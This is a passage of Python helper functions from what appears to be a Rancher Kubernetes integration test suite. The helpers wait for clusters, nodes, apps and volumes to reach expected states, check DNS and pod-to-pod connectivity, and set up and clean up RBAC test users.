len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id],
"targetPort": TEST_IMAGE_PORT}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected, port=TEST_IMAGE_PORT):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected, port=port)
def retry_dig(host, pod, expected, retry_count=3):
    for _ in range(0, retry_count):
        dig_cmd = 'dig {0} +short'.format(host)
        dig_output = kubectl_pod_exec(pod, dig_cmd)
        decode_dig = dig_output.decode('utf-8')
        split_dig = decode_dig.splitlines()
        if len(split_dig) >= len(expected):
            return dig_output
        time.sleep(3)
    pytest.fail("failed to get the expected number of dns hosts from dig")
def validate_dns_entry(pod, host, expected, port=TEST_IMAGE_PORT, retry_count=3):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
if HARDENED_CLUSTER:
cmd = 'curl -vs {}:{} 2>&1'.format(host, port)
else:
cmd = 'ping -c 1 -W 1 {0}'.format(host)
cmd_output = kubectl_pod_exec(pod, cmd)
if str(pod.name) not in str(cmd_output):
for i in range(0, retry_count):
cmd_output = kubectl_pod_exec(pod, cmd)
if str(pod.name) in str(cmd_output):
break
else:
time.sleep(5)
connectivity_validation_pass = False
for expected_value in expected:
if expected_value in str(cmd_output):
connectivity_validation_pass = True
break
assert connectivity_validation_pass is True
if HARDENED_CLUSTER:
assert " 200 OK" in str(cmd_output)
else:
assert " 0% packet loss" in str(cmd_output)
dig_output = retry_dig(host, pod, expected)
for expected_value in expected:
assert expected_value in str(dig_output), \
"Error the dig command returned: {0}".format(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
    Validates that dns_record is no longer returned for the given client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
            raise AssertionError(
                "Timed out waiting for node state to get to "
                "{}".format(state))
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for node delete")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for cluster to have "
                "{} nodes".format(expected_node_count))
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
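    """Build the registration command for adding a custom node, appending
    the requested roles (or the Windows worker command) plus the node's
    public and internal addresses."""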
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
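    """Ping (or curl on hardened clusters) pod2 from pod1 and assert that
    the result matches the allow_connectivity flag."""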
pod_ip = pod2.status.podIp
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
elif HARDENED_CLUSTER:
cmd = 'curl -I {}:{}'.format(pod_ip, TEST_IMAGE_PORT)
else:
cmd = "ping -c 1 -W 1 " + pod_ip
response = kubectl_pod_exec(pod1, cmd)
if not HARDENED_CLUSTER:
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" not in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
        for x in range(0, numofpods):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
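    """Wait for the cluster to pass through the expected intermediate
    state (when requested), reach "active", have its nodes active and
    report a Kubernetes version; log the total provisioning time."""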
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
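    """Reload the object with exponential backoff (capped at 2 seconds)
    until it can be read, treating 403 responses as "not yet visible"."""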
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
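    """Verify the workload's NodePort: the advertised port must match
    source_port and every schedulable node must serve responses from the
    workload's pods."""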
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
        cmd_write = \
            'powershell -NoLogo -NonInteractive -Command ' \
            '"& {{ echo {1} > {0} }}"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
        cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
                          '"& {{ cat {0} }}"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
    First wait for the app to reach the deploying state, then wait for it
    to become active. This avoids wrongly concluding that the app is
    active, as an app cycles through installing > active > deploying > active.
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for {0} to get to active,"
" the actual state: {1}".format(application.name,
application.state))
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
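    """Build a default answer set for the catalog template revision
    identified by externalId, honoring showIf/showSubquestionIf conditions
    and filling required questions that have no default value."""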
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
            # If required and no default value is available, set a fake
            # value based on the question type; error out for unsupported
            # types
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
    @param proj_client: Project client object of an existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
    @param answer: answers the app requires while deploying (body of the post call).
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
